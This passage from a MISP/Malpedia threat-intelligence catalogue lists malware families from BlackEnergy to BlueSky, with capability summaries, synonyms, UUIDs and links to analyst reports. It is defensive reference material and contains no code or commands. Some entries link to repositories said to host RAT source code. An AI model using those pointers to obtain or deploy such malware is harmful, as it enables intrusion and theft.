Typical for the distribution of BE3 was heavy use of spear-phishing emails containing Microsoft Word or Excel documents with a malicious VBA macro, Rich Text Format (RTF) documents embedding exploits, or a PowerPoint presentation with the zero-day exploit CVE-2014-4114.
On 23 December 2015, attackers behind the BlackEnergy malware successfully caused power outages for several hours in different regions of Ukraine. This cyber sabotage against three energy companies was confirmed by the Ukrainian government. The power grid compromise has become known as the first-of-its-kind cyber warfare attack affecting civilians.
Internal MISP references
UUID 82c644ab-550a-4a83-9b35-d545f4719069
which can be used as unique global reference for BlackEnergy
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.blackenergy - webarchive
- https://cocomelonc.github.io/tutorial/2022/05/09/malware-pers-4.html - webarchive
- https://www.ironnet.com/blog/russian-cyber-attack-campaigns-and-actors - webarchive
- https://www.picussecurity.com/blog/picus-10-critical-mitre-attck-techniques-t1055-process-injection - webarchive
- https://symantec.broadcom.com/hubfs/Attacks-Against-Critical_Infrastructrure.pdf - webarchive
- https://marcusedmondson.com/2019/01/18/black-energy-analysis/ - webarchive
- https://www.tesorion.nl/en/resources/pdfstore/Report-OSINT-Russia-Ukraine-Conflict-Cyberaspect.pdf - webarchive
- https://www.secureworks.com/research/blackenergy2 - webarchive
- https://go.recordedfuture.com/hubfs/reports/cta-2021-0909.pdf - webarchive
- https://web.archive.org/web/20140428201836/http://www.fireeye.com/blog/technical/malware-research/2010/03/black-energy-crypto.html - webarchive
- https://www.riskint.blog/post/revisited-fancy-bear-s-new-faces-and-sandworms-too - webarchive
- https://www.cisa.gov/uscert/sites/default/files/publications/AA22-110A_Joint_CSA_Russian_State-Sponsored_and_Criminal_Cyber_Threats_to_Critical_Infrastructure_4_20_22_Final.pdf - webarchive
- https://attack.mitre.org/groups/G0034 - webarchive
- https://www.virusbulletin.com/uploads/pdf/magazine/2016/VB2016-Cherepanov-Lipovsky.pdf - webarchive
- https://services.google.com/fh/files/misc/apt44-unearthing-sandworm.pdf - webarchive
- https://www.gov.uk/government/news/uk-exposes-series-of-russian-cyber-attacks-against-olympic-and-paralympic-games - webarchive
- https://enterprise.verizon.com/resources/reports/2019-data-breach-investigations-report.pdf - webarchive
- https://cocomelonc.github.io/tutorial/2022/04/20/malware-pers-1.html - webarchive
- https://securelist.com/black-ddos/36309/ - webarchive
- https://securelist.com/be2-custom-plugins-router-abuse-and-target-profiles/67353/ - webarchive
- https://securelist.com/blackenergy-apt-attacks-in-ukraine-employ-spearphishing-with-word-documents/73440/ - webarchive
- http://pds15.egloos.com/pds/201001/01/66/BlackEnergy_DDoS_Bot_Analysis.pdf - webarchive
- https://threatconnect.com/blog/casting-a-light-on-blackenergy/ - webarchive
- http://atlas-public.ec2.arbor.net/docs/BlackEnergy+DDoS+Bot+Analysis.pdf - webarchive
- https://www.cisa.gov/uscert/ncas/alerts/aa22-110a - webarchive
- https://www.secureworks.com/research/threat-profiles/iron-viking - webarchive
- https://securelist.com/be2-extraordinary-plugins-siemens-targeting-dev-fails/68838/ - webarchive
- https://www.welivesecurity.com/2014/10/14/cve-2014-4114-details-august-blackenergy-powerpoint-campaigns/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
BlackGuard
According to Zscaler, BlackGuard has the capability to steal all types of information related to Crypto wallets, VPN, Messengers, FTP credentials, saved browser credentials, and email clients.
Internal MISP references
UUID 86048398-cfc2-4d6c-a49f-9114e2966b61
which can be used as unique global reference for BlackGuard
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.blackguard - webarchive
- https://thehackernews.com/2022/04/experts-shed-light-on-blackguard.html - webarchive
- https://blogs.blackberry.com/en/2022/04/threat-thursday-blackguard-infostealer - webarchive
- https://medium.com/s2wblog/rising-stealer-in-q1-2022-blackguard-stealer-f516d9f85ee5 - webarchive
- https://www.techtimes.com/articles/273752/20220331/new-password-stealing-malware-hacking-forum-hack-password-stealing-google-chrome-binance-outlook-telegram.htm - webarchive
- https://medium.com/s2wblog/the-history-of-blackguard-stealer-86207e72ffb4 - webarchive
- https://www.zscaler.com/blogs/security-research/analysis-blackguard-new-info-stealer-malware-being-sold-russian-hacking - webarchive
- https://blog.cyble.com/2022/04/01/dissecting-blackguard-info-stealer/ - webarchive
- https://www.youtube.com/watch?v=Fd8WjxzY2_g - webarchive
- https://cyberint.com/blog/research/blackguard-stealer/ - webarchive
- https://www.zdnet.com/article/meet-blackguard-a-new-infostealer-peddled-on-russian-hacker-forums/ - webarchive
- https://www.bleepingcomputer.com/news/security/new-meta-information-stealer-distributed-in-malspam-campaign/ - webarchive
- https://team-cymru.com/blog/2022/05/25/bablosoft-lowering-the-barrier-of-entry-for-malicious-actors/ - webarchive
- https://www.bleepingcomputer.com/news/security/new-blackguard-password-stealing-malware-sold-on-hacker-forums/ - webarchive
- https://www.f5.com/labs/articles/threat-intelligence/blackguard-infostealer-malware-dissecting-the-state-of-exfiltrated-data - webarchive
- https://ke-la.com/information-stealers-a-new-landscape/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
BlackKingdom Ransomware
Internal MISP references
UUID 246b6563-edd8-49c7-9d3c-97dc1aec6b81
which can be used as unique global reference for BlackKingdom Ransomware
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.blackkingdom_ransomware - webarchive
- https://news.sophos.com/en-us/2021/03/23/black-kingdom/ - webarchive
- https://id-ransomware.blogspot.com/2020/02/blackkingdom-ransomware.html - webarchive
- https://www.trendmicro.com/en_us/research/21/e/proxylogon-a-coinminer--a-ransomware--and-a-botnet-join-the-part.html - webarchive
- https://news.sophos.com/en-us/2022/03/17/the-ransomware-threat-intelligence-center/ - webarchive
- https://securelist.com/black-kingdom-ransomware/102873/ - webarchive
- https://www.advanced-intel.com/post/adversarial-perspective-advintel-breach-avoidance-through-monitoring-initial-vulnerabilities - webarchive
- https://blog.redteam.pl/2020/06/black-kingdom-ransomware.html - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
BlackLotus
Internal MISP references
UUID 6d542c85-cf94-466f-97a2-eac3c50fbea2
which can be used as unique global reference for BlackLotus
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.blacklotus - webarchive
- https://www.microsoft.com/en-us/security/blog/2023/04/11/guidance-for-investigating-attacks-using-cve-2022-21894-the-blacklotus-campaign/ - webarchive
- https://www.welivesecurity.com/2023/03/01/blacklotus-uefi-bootkit-myth-confirmed/ - webarchive
- https://kn0s-organization.gitbook.io/blacklotus-analysis-stage2-bootkit-rootkit-stage/ - webarchive
- https://cocomelonc.github.io/book/2023/12/13/malwild-book.html - webarchive
- https://www.binarly.io/posts/The_Untold_Story_of_the_BlackLotus_UEFI_Bootkit/index.html - webarchive
- https://blog.bushidotoken.net/2023/08/tracking-adversaries-scattered-spider.html - webarchive
- https://mssplab.github.io/threat-hunting/2023/07/15/malware-src-blacklotus.html - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
BlackMagic
Ransomware
Internal MISP references
UUID 80735865-325c-4829-a6df-22e5d84735e6
which can be used as unique global reference for BlackMagic
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
BlackMatter (Windows)
According to PCrisk, BlackMatter is a piece of malicious software categorized as ransomware. It operates by encrypting data for the purpose of making ransom demands for the decryption tools. In other words, files affected by BlackMatter are rendered inaccessible, and victims are asked to pay to recover access to their data.
During the encryption process, files are appended with an extension consisting of a random character string. For example, a file initially named "1.jpg" would appear as something similar to "1.jpg.k5RO9fVOl". After this process is complete, the ransomware changes the desktop wallpaper and creates a ransom note, "[random_string].README.txt" (e.g., k5RO9fVOl.README.txt).
Internal MISP references
UUID f838f3bb-a36b-49df-8f8c-1bb8cf66b736
which can be used as unique global reference for BlackMatter (Windows)
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.blackmatter - webarchive
- https://medium.com/s2wlab/blackmatter-x-babuk-using-the-same-web-server-for-sharing-leaked-files-d01c20a74751 - webarchive
- https://www.ciphertechsolutions.com/rapidly-evolving-blackmatter-ransomware-tactics/ - webarchive
- https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/blackmatter-data-exfiltration - webarchive
- https://www.mcafee.com/blogs/enterprise/blackmatter-ransomware-analysis-the-dark-side-returns/ - webarchive
- https://ke-la.com/the-ideal-ransomware-victim-what-attackers-are-looking-for/ - webarchive
- https://www.crowdstrike.com/blog/big-game-hunting-on-the-rise-again-according-to-ecrime-index/ - webarchive
- https://go.recordedfuture.com/hubfs/reports/cta-2022-0802.pdf - webarchive
- https://www.nozominetworks.com/blog/blackmatter-ransomware-technical-analysis-and-tools-from-nozomi-networks-labs/ - webarchive
- https://www.symantec.broadcom.com/hubfs/SED/SED_Threat_Hunter_Reports_Alerts/SED_FY22Q2_SES_Ransomware-Threat-Landscape_WP.pdf - webarchive
- https://news.sophos.com/en-us/2022/03/17/the-ransomware-threat-intelligence-center/ - webarchive
- https://www.mandiant.com/resources/cryptography-blackmatter-ransomware - webarchive
- https://blog.group-ib.com/blackmatter2 - webarchive
- https://www.s-rminform.com/cyber-intelligence-briefing/exmatter-malware-levels-up - webarchive
- https://therecord.media/darkside-ransomware-gang-moves-some-of-its-bitcoin-after-revil-got-hit-by-law-enforcement/ - webarchive
- https://assets.virustotal.com/reports/2021trends.pdf - webarchive
- https://www.trendmicro.com/en_us/research/22/g/lockbit-ransomware-group-augments-its-latest-variant--lockbit-3-.html - webarchive
- https://www.glimps.fr/lockbit3-0/ - webarchive
- https://chuongdong.com/reverse%20engineering/2021/09/05/BlackMatterRansomware/ - webarchive
- https://www.crowdstrike.com/blog/how-big-game-hunting-ttps-shifted-after-darkside-pipeline-attack/ - webarchive
- https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself/ - webarchive
- https://www.varonis.com/blog/blackmatter-ransomware/ - webarchive
- https://www.elliptic.co/blog/darkside-bitcoins-on-the-move-following-government-cyberattack-against-revil-ransomware-group - webarchive
- https://blog.minerva-labs.com/blackmatter - webarchive
- https://www.bleepingcomputer.com/news/security/darkside-ransomware-rushes-to-cash-out-7-million-in-bitcoin/ - webarchive
- https://www.tesorion.nl/en/posts/analysis-of-the-blackmatter-ransomware/ - webarchive
- https://medium.com/s2wlab/grooves-thoughts-on-blackmatter-babuk-and-interruption-in-the-supply-of-cheese-in-the-b5328bc764f2 - webarchive
- https://us-cert.cisa.gov/ncas/alerts/aa21-291a - webarchive
- https://raw.githubusercontent.com/antonioCoco/infosec-talks/main/InsomniHack_2022_Ransomware_Encryption_Internals.pdf - webarchive
- https://symantec.broadcom.com/hubfs/The_Ransomware_Threat_September_2021.pdf - webarchive
- https://www.microsoft.com/security/blog/2022/04/13/dismantling-zloader-how-malicious-ads-led-to-disabled-security-tools-and-ransomware/ - webarchive
- https://blogs.blackberry.com/en/2022/01/kraken-the-code-on-prometheus - webarchive
- https://www.bleepingcomputer.com/news/security/blackmatter-ransomware-moves-victims-to-lockbit-after-shutdown/ - webarchive
- https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/noberus-blackcat-ransomware-ttps - webarchive
- https://www.netskope.com/blog/netskope-threat-coverage-blackmatter - webarchive
- https://medium.com/s2wblog/blackcat-new-rust-based-ransomware-borrowing-blackmatters-configuration-31c8d330a809 - webarchive
- https://www.mandiant.com/resources/chasing-avaddon-ransomware - webarchive
- https://thehackernews.com/2022/04/researchers-connect-blackcat-ransomware.html - webarchive
- https://www.crowdstrike.com/blog/carbon-spider-embraces-big-game-hunting-part-2/ - webarchive
- https://services.google.com/fh/files/misc/gcat_threathorizons_full_nov2021.pdf - webarchive
- https://medium.com/s2wlab/groove-x-ramp-the-relation-between-groove-babuk-ramp-and-blackmatter-f75644f8f92d - webarchive
- https://twitter.com/GelosSnake/status/1451465959894667275 - webarchive
- https://blog.talosintelligence.com/2022/03/from-blackmatter-to-blackcat-analyzing.html - webarchive
- https://cert.ssi.gouv.fr/uploads/20220427_NP_TLPWHITE_ANSSI_FIN7.pdf - webarchive
- https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself - webarchive
- https://blogs.blackberry.com/en/2021/09/threat-thursday-blackmatter-ransomware-as-a-service - webarchive
- https://www.mcafee.com/blogs/enterprise/mcafee-enterprise-atr/how-groove-gang-is-shaking-up-the-ransomware-as-a-service-market-to-empower-affiliates/ - webarchive
- https://www.splunk.com/en_us/pdfs/resources/whitepaper/an-empirically-comparative-analysis-of-ransomware-binaries.pdf - webarchive
- https://www.splunk.com/en_us/blog/security/gone-in-52-seconds-and-42-minutes-a-comparative-analysis-of-ransomware-encryption-speed.html - webarchive
- https://blog.digital-investigations.info/2021-08-05-understanding-blackmatters-api-hashing.html - webarchive
- https://news.sophos.com/en-us/2021/08/09/blackmatter-ransomware-emerges-from-the-shadow-of-darkside/ - webarchive
- https://therecord.media/blackmatter-ransomware-says-its-shutting-down-due-to-pressure-from-local-authorities/ - webarchive
- https://go.recordedfuture.com/hubfs/reports/MTP-2021-0804.pdf - webarchive
- https://www.hhs.gov/sites/default/files/demystifying-blackmatter.pdf - webarchive
- https://www.theregister.com/2022/03/22/talos-ransomware-blackcat/ - webarchive
- https://www.youtube.com/watch?v=NIiEcOryLpI - webarchive
- https://blog.group-ib.com/blackmatter# - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
BlackNET RAT
Advanced and modern Windows botnet with PHP panel developed using VB.NET. It has a lot of functionalities including: stealing/grabbing files and passwords, keylogging, cryptojacking, loading files, executing commands, etc. It is open source and emerged at the end of 2019.
Internal MISP references
UUID 656c4009-cd79-4501-9fc9-7ad2d97b634c
which can be used as unique global reference for BlackNET RAT
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.blacknet_rat - webarchive
- https://github.com/FarisCode511/BlackNET/ - webarchive
- https://labs.k7computing.com/?p=21365 - webarchive
- https://blog.malwarebytes.com/threat-analysis/2020/03/fake-corona-antivirus-distributes-blacknet-remote-administration-tool/ - webarchive
- https://github.com/BlackHacker511/BlackNET/ - webarchive
- https://github.com/mave12/BlackNET-3.7.0.1 - webarchive
- https://blog.minerva-labs.com/become-a-vip-victim-with-new-discord-distributed-malware - webarchive
- http://www.pwncode.io/2019/12/blacknet-rat-when-you-leave-panel.html - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
BlackNix RAT
Internal MISP references
UUID 845ce966-fb40-4f12-b9c1-8b97263a589e
which can be used as unique global reference for BlackNix RAT
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
BlackPOS
BlackPOS infects computers running on Windows that have credit card readers connected to them and are part of a POS system. POS system computers can be easily infected if they do not have the most up to date operating systems and antivirus programs to prevent security breaches or if the computer database systems have weak administration login credentials.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular BlackPOS.
Known Synonyms |
---|
Kaptoxa |
MMon |
POSWDS |
Reedum |
Internal MISP references
UUID 1e62fc1f-daa7-416f-9159-099798bb862c
which can be used as unique global reference for BlackPOS
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.blackpos - webarchive
- https://usa.visa.com/dam/VCOM/global/support-legal/documents/new-pos-malware-samples.pdf - webarchive
- https://web.archive.org/web/20200509171721/https://raw.githubusercontent.com/fdiskyou/threat-INTel/master/2015/GlobalThreatIntelReport.pdf - webarchive
- https://blog.trendmicro.com/trendlabs-security-intelligence/new-blackpos-malware-emerges-in-the-wild-targets-retail-accounts/ - webarchive
- https://blog.trendmicro.com/trendlabs-security-intelligence/operation-black-atlas-endangers-in-store-card-payments-and-smbs-worldwide-switches-between-blackpos-and-other-tools/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
BlackRemote
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular BlackRemote.
Known Synonyms |
---|
BlackRAT |
Internal MISP references
UUID b1302517-d5c9-44bb-833d-4396365915db
which can be used as unique global reference for BlackRemote
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.blackremote - webarchive
- https://asec.ahnlab.com/en/56405/ - webarchive
- https://news.sophos.com/en-us/2020/05/14/raticate/ - webarchive
- https://unit42.paloaltonetworks.jp/blackremote-money-money-money-a-swedish-actor-peddles-an-expensive-new-rat/ - webarchive
- https://unit42.paloaltonetworks.com/blackremote-money-money-money-a-swedish-actor-peddles-an-expensive-new-rat/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
BlackRevolution
Internal MISP references
UUID 6a5bd819-5fbc-437b-92c4-ce0dfb5c67f8
which can be used as unique global reference for BlackRevolution
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
BlackRouter
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular BlackRouter.
Known Synonyms |
---|
BLACKHEART |
Internal MISP references
UUID 0b235fbf-c191-47c0-ae83-9386a64b1c79
which can be used as unique global reference for BlackRouter
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.blackrouter - webarchive
- https://www.bleepingcomputer.com/news/security/blackrouter-ransomware-promoted-as-a-raas-by-iranian-developer/ - webarchive
- https://blog.trendmicro.com/trendlabs-security-intelligence/legitimate-application-anydesk-bundled-with-new-ransomware-variant/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Blackruby
Ransomware.
Internal MISP references
UUID 617d53dd-1143-4146-bbc0-39e975a26fe5
which can be used as unique global reference for Blackruby
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.blackruby - webarchive
- https://www.bleepingcomputer.com/news/security/black-ruby-ransomware-skips-victims-in-iran-and-adds-a-miner-for-good-measure/ - webarchive
- https://www.acronis.com/en-us/blog/posts/black-ruby-combining-ransomware-and-coin-miner-malware - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
BlackShades
Internal MISP references
UUID 0fb57d46-1c4f-49a3-80c2-05bcaa34ec1b
which can be used as unique global reference for BlackShades
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.blackshades - webarchive
- https://blog.malwarebytes.com/threat-analysis/2012/06/blackshades-in-syria/ - webarchive
- https://blog.malwarebytes.com/threat-analysis/2012/06/you-dirty-rat-part-2-blackshades-net/ - webarchive
- https://blog.malwarebytes.com/threat-analysis/2014/05/taking-off-the-blackshades/ - webarchive
- http://contagiodump.blogspot.com/2012/06/rat-samples-from-syrian-targeted.html - webarchive
- https://www.secureworks.com/research/threat-profiles/aluminum-saratoga - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
BlackSnake
Internal MISP references
UUID 366fe903-5ab4-47d3-a0e0-8ff45b2b4a8c
which can be used as unique global reference for BlackSnake
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
BlackSoul
Internal MISP references
UUID 58701e4d-87aa-45a5-adfd-9b20f50fea91
which can be used as unique global reference for BlackSoul
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
BlackSuit (Windows)
According to Trend Micro, this ransomware has significant code overlap with Royal Ransomware.
Internal MISP references
UUID b73202ea-e636-4e70-91b1-f29c1db4cbb1
which can be used as unique global reference for BlackSuit (Windows)
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.blacksuit - webarchive
- https://blog.cyble.com/2023/05/12/blacksuit-ransomware-strikes-windows-and-linux-users/ - webarchive
- https://thedfirreport.com/2024/08/26/blacksuit-ransomware/ - webarchive
- https://www.trendmicro.com/en_us/research/23/e/investigating-blacksuit-ransomwares-similarities-to-royal.html - webarchive
- https://www.reliaquest.com/blog/blacksuit-attack-analysis/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Blackworm RAT
Internal MISP references
UUID 02d2bb6d-9641-406e-9767-58aff2fad6c7
which can be used as unique global reference for Blackworm RAT
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.blackworm_rat - webarchive
- https://www.fidelissecurity.com/threatgeek/archive/down-h-w0rm-hole-houdinis-rat/ - webarchive
- https://github.com/BlackHacker511/BlackWorm - webarchive
- https://www.fireeye.com/blog/threat-research/2014/08/connecting-the-dots-syrian-malware-team-uses-blackworm-for-attacks.html - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
BleachGap
Internal MISP references
UUID cfcdbf20-304e-4ea4-bec1-d84bb78e723f
which can be used as unique global reference for BleachGap
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
BLINDINGCAN
BLINDINGCAN is a remote access trojan that communicates with its C&C server via HTTP(S). It uses a (custom) RC4 or AES for encryption and decryption of its configuration and network traffic. It sends information about the victim's environment, like computer name, IP, Windows product name and processor name. It supports around 30 commands that include operations on the victim's filesystem, basic process management, command line execution, file exfiltration, configuration update, and the download and execution of additional payloads from the attackers' C&C. The commands are indexed by 16-bit integers, starting with the index 0x2009 and going incrementally up to 0x2057, with some indices being skipped. It uses various parameter names in its HTTP POST requests, mostly associated with web servers running bulletin board systems, like bbs, article, boardid, s_board, page, idx_num, etc. It contains specific RTTI symbols like ".?AVCHTTP_Protocol@@", ".?AVCFileRW@@" or ".?AVCSinSocket@@". BLINDINGCAN RAT is a flagship payload deployed in many Lazarus attacks, especially in the Operation DreamJob campaigns happening in 2020-2022.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular BLINDINGCAN.
Known Synonyms |
---|
AIRDRY |
ZetaNile |
Internal MISP references
UUID 44d22b4e-5ad4-4f05-a421-95607706378d
which can be used as unique global reference for BLINDINGCAN
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.blindingcan - webarchive
- https://us-cert.cisa.gov/ncas/analysis-reports/ar20-232a - webarchive
- https://www.cisa.gov/news-events/analysis-reports/ar20-232a - webarchive
- https://www.hvs-consulting.de/media/downloads/ThreatReport-Lazarus.pdf - webarchive
- https://www.hvs-consulting.de/lazarus-report/ - webarchive
- https://securelist.com/the-lazarus-group-deathnote-campaign/109490/ - webarchive
- https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf - webarchive
- https://www.welivesecurity.com/2022/09/30/amazon-themed-campaigns-lazarus-netherlands-belgium/ - webarchive
- https://www.sentinelone.com/blog/the-blindingcan-rat-and-malicious-north-korean-activity/ - webarchive
- https://www.microsoft.com/security/blog/2022/09/29/zinc-weaponizing-open-source-software/ - webarchive
- https://securelist.com/it-threat-evolution-q2-2023/110355/ - webarchive
- https://blogs.jpcert.or.jp/en/2020/09/BLINDINGCAN.html - webarchive
- https://www.virusbulletin.com/uploads/pdf/conference/vb2023/papers/Lazarus-campaigns-and-backdoors-in-2022-2023.pdf - webarchive
- https://www.mandiant.com/resources/blog/dprk-whatsapp-phishing - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
BLINDTOAD
BLINDTOAD is a 64-bit service DLL that loads an encrypted file from disk and executes it in memory.
Internal MISP references
UUID b34fd401-9d37-4bc6-908f-448c1697f749
which can be used as unique global reference for BLINDTOAD
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.blindtoad - webarchive
- https://blog.trendmicro.com/trendlabs-security-intelligence/lazarus-continues-heists-mounts-attacks-on-financial-organizations-in-latin-america/ - webarchive
- https://baesystemsai.blogspot.com/2017/10/taiwan-heist-lazarus-tools.html - webarchive
- https://adeo.com.tr/wp-content/uploads/2020/05/ADEO-Lazarus-APT38.pdf - webarchive
- https://content.fireeye.com/apt/rpt-apt38 - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Blister
Elastic observed this loader coming with valid code signatures, being used to deploy secondary payloads in-memory.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Blister.
Known Synonyms |
---|
COLORFAKE |
Internal MISP references
UUID 8ffc1f23-c0a6-4186-b06e-11a72c153722
which can be used as unique global reference for Blister
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.blister - webarchive
- https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself - webarchive
- https://redcanary.com/blog/intelligence-insights-january-2022/ - webarchive
- https://cloudsek.com/technical-analysis-of-code-signed-blister-malware-campaign-part-2/ - webarchive
- https://cloudsek.com/technical-analysis-of-code-signed-blister-malware-campaign-part-1/ - webarchive
- https://blog.fox-it.com/2023/11/01/popping-blisters-for-research-an-overview-of-past-payloads-and-exploring-recent-developments/ - webarchive
- https://www.elastic.co/security-labs/revisiting-blister-new-developments-of-the-blister-loader - webarchive
- https://www.mandiant.com/resources/unc2165-shifts-to-evade-sanctions - webarchive
- https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself/ - webarchive
- https://www.trendmicro.com/en_us/research/22/d/Thwarting-Loaders-From-SocGholish-to-BLISTERs-LockBit-Payload.html - webarchive
- https://security-labs.elastic.co/security-labs/revisiting-blister-new-developments-of-the-blister-loader - webarchive
- https://elastic.github.io/security-research/malware/2022/05/02.blister/article/ - webarchive
- https://www.trendmicro.com/en_no/research/22/d/Thwarting-Loaders-From-SocGholish-to-BLISTERs-LockBit-Payload.html - webarchive
- https://www.elastic.co/blog/elastic-security-uncovers-blister-malware-campaign - webarchive
- https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/d/thwarting-loaders-from-socgholish-to-blisters-lockbit-payload/iocs-thwarting-loaders-socgholish-blister.txt - webarchive
- https://killingthebear.jorgetesta.tech/actors/evil-corp - webarchive
- https://medium.com/walmartglobaltech/socgholish-campaigns-and-initial-access-kit-4c4283fea8ee - webarchive
- https://twitter.com/MsftSecIntel/status/1522690116979855360 - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
BloodAlchemy
This malware family is the suspected successor to ShadowPad and Deed rat.
Internal MISP references
UUID ca547f0c-6cd1-4381-bcf1-143dd0798690
which can be used as unique global reference for BloodAlchemy
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
BloodyStealer
Internal MISP references
UUID ecdc0a43-8845-4dc4-a3f0-de2f0142aa4d
which can be used as unique global reference for BloodyStealer
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
BlueFox
BlueFox is a .NET infostealer sold on forums as a Malware-as-a-Service. Its capabilities are those of a classic information stealer, with a focus on cryptocurrency wallets, plus file grabber and loader capabilities.
Internal MISP references
UUID f9f5d767-3460-49f3-94c2-5dd91b341505
which can be used as unique global reference for BlueFox
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
BLUEHAZE
Mandiant associates this malware with UNC4191; it is a launcher for NCAT used to establish a reverse tunnel.
Internal MISP references
UUID 3dcfef7b-d657-4ac5-b738-ef793237274b
which can be used as unique global reference for BLUEHAZE
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
BLUELIGHT
Malware family used to deliver follow-up payloads; variants using the Microsoft Graph API and Google Web Apps have been observed.
Internal MISP references
UUID 9c5ec440-2bb8-4485-9811-f2fb52cf76e5
which can be used as unique global reference for BLUELIGHT
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
BlueNoroff
This family contains the BlueNoroff toolkit used for SWIFT manipulation, as used by the Lazarus activity cluster also referred to as BlueNoroff.
Internal MISP references
UUID 862e9c13-dde6-473e-a816-a7d7043bf73c
which can be used as unique global reference for BlueNoroff
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
BlueShell
According to AhnLab, BlueShell is a backdoor malware developed in Go language, published on Github, and it supports Windows, Linux, and Mac operating systems. Currently, the original Github repository is presumed to have been deleted, but the BlueShell source code can still be obtained from other repositories. It features an explanatory ReadMe file in Chinese, indicating the possibility that the creator is a Chinese user.
Internal MISP references
UUID 91d441a6-4244-43a2-9b96-354a2df63a4e
which can be used as unique global reference for BlueShell
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.blueshell - webarchive
- https://hunt.io/blog/blueshell-four-years-on-still-a-formidable-threat - webarchive
- https://asec.ahnlab.com/en/47455/ - webarchive
- https://asec.ahnlab.com/ko/56715/ - webarchive
- https://asec.ahnlab.com/en/56941/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
BlueSky
Ransomware.
Internal MISP references
UUID 5c19d979-4c22-452f-b4f0-9325a46b7083
which can be used as unique global reference for BlueSky
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.bluesky - webarchive
- https://yoroi.company/research/dissecting-bluesky-ransomware-payload/ - webarchive
- https://thedfirreport.com/2023/12/04/sql-brute-force-leads-to-bluesky-ransomware/ - webarchive
- https://cloudsek.com/technical-analysis-of-bluesky-ransomware/ - webarchive
- https://www.sentinelone.com/blog/bluesky-ransomware-ad-lateral-movement-evasion-and-fast-encryption-puts-threat-on-the-radar/ - webarchive
